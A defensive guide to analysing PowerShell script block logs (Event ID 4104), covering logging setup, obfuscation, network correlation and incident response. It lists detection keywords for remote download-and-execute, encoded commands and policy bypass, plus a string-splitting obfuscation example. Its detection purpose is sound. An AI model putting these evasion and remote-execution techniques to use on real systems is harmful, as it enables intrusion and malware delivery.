Steps to Analyze PowerShell Logging (Event ID 4104) for Malicious Activity

PowerShell logging (Event ID 4104) provides critical visibility into script block execution. Detecting malicious activity requires systematic analysis of logged commands, behavior patterns, and context.

1. Enable Detailed PowerShell Logging

What to Do:

  • Configure PowerShell to log detailed script block execution using Event ID 4104.

  • Enable additional logging options such as:

    • Script Block Logging: Captures executed PowerShell commands.

    • Module Logging: Tracks loaded modules and their usage.

    • Transcription Logging: Logs all input and output from PowerShell sessions.

Why It Matters: These settings ensure comprehensive visibility into all executed PowerShell commands and scripts.

2. Review Suspicious Commands

What to Look For:

  • Network Activity: Use of commands like Invoke-WebRequest or Invoke-Expression to download or execute remote code.

  • Encoded Commands: -EncodedCommand often conceals malicious payloads.

  • Policy Bypass: -ExecutionPolicy Bypass to override execution policies and run unsigned scripts.

  • Malicious Script Content: Commands to disable security tools, establish persistence, or exfiltrate data.

Analysis Tip: Legitimate scripts rarely use combinations of these flags and commands without administrative intent.

3. Check for Obfuscation

What to Look For:

  • Base64 Encoding: Encoded scripts with long strings of random characters.

  • String Splitting: Commands split across multiple concatenated parts (e.g., I+"nvo"+"ke-Co"+"mmand).

  • Excessive Use of Aliases: Abbreviations like iwr for Invoke-WebRequest.

Legitimate Scripts: Typically use readable and straightforward code for debugging and maintenance purposes.

4. Correlate with Network Activity

What to Do:

  • Compare PowerShell logs with network traffic logs to identify external connections initiated by the script.

  • Focus on connections to:

    • Unknown or foreign IP addresses.

    • Domains flagged by threat intelligence feeds.

Red Flags: Outbound connections to download payloads, communicate with command-and-control (C2) servers, or exfiltrate data.

5. Analyze the Execution Context

What to Look For:

  • User Account: Scripts executed under privileged accounts (e.g., administrator or domain admin) demand attention.

  • Machine Context: Activity on critical systems like domain controllers, application servers, or financial systems is more suspicious.

  • Trigger Source: Investigate whether the script was:

    • Manually executed by a user.

    • Triggered by an automated process (e.g., Task Scheduler).

Context Clues: Legitimate scripts are often run by IT personnel for maintenance purposes, not end-users or unknown accounts.

6. Automate Detection

How to Implement:

  • Use SIEM (e.g., Splunk, QRadar) or EDR tools (e.g., CrowdStrike, Microsoft Defender) to:

    • Detect patterns indicative of malicious behavior.

    • Set alerts for specific keywords such as Invoke-WebRequest, -EncodedCommand, and obfuscated code.

  • Incorporate MITRE ATT&CK tactics to identify known PowerShell attack methods.

Benefit: Automation reduces manual effort and ensures consistent detection of malicious activity.

7. Response Actions

Immediate Steps:

  • Isolate the System: Disconnect the affected device from the network to prevent further compromise or lateral movement.

  • Block Network Connections: Restrict outbound traffic from the compromised machine.

  • Collect Forensic Evidence: Capture:

    • The full PowerShell session log.

    • Associated scripts, network traffic, and any dropped payloads.

Post-Incident Actions:

  • Conduct a thorough investigation to assess the scope and impact of the compromise.

  • Apply detection rules in security systems to flag similar activity in the future.

  • Update PowerShell policies to restrict usage:

    • Enforce Constrained Language Mode for non-administrative users.

    • Limit execution rights to specific roles or users.

Enhancing Detection and Prevention

Enable Advanced Monitoring:

  • Turn on Script Block Logging and Module Logging for deeper insight into executed scripts.

  • Leverage tools like Microsoft Advanced Threat Analytics (ATA) or Defender for Endpoint for real-time detection.

Restrict PowerShell Access:

  • Limit PowerShell usage to administrators and require Just-In-Time (JIT) access for elevated permissions.

  • Use Application Control Policies to block unauthorized scripts.

Educate Users and IT Staff:

  • Train personnel to recognize phishing emails and malicious documents that often trigger PowerShell attacks.

  • Ensure IT teams understand secure PowerShell practices.

Conclusion

By analyzing PowerShell logs (Event ID 4104) for suspicious commands, obfuscation, and execution context, organizations can identify potential threats early. Correlating log data with network activity and leveraging automated detection ensures a faster and more effective response to malicious PowerShell activity.

PreviousDetecting and Analyzing a Potential Data Exfiltration Incident Using Log DataNextHow to Identify an Internal Pivot Attack Using Log Data

Last updated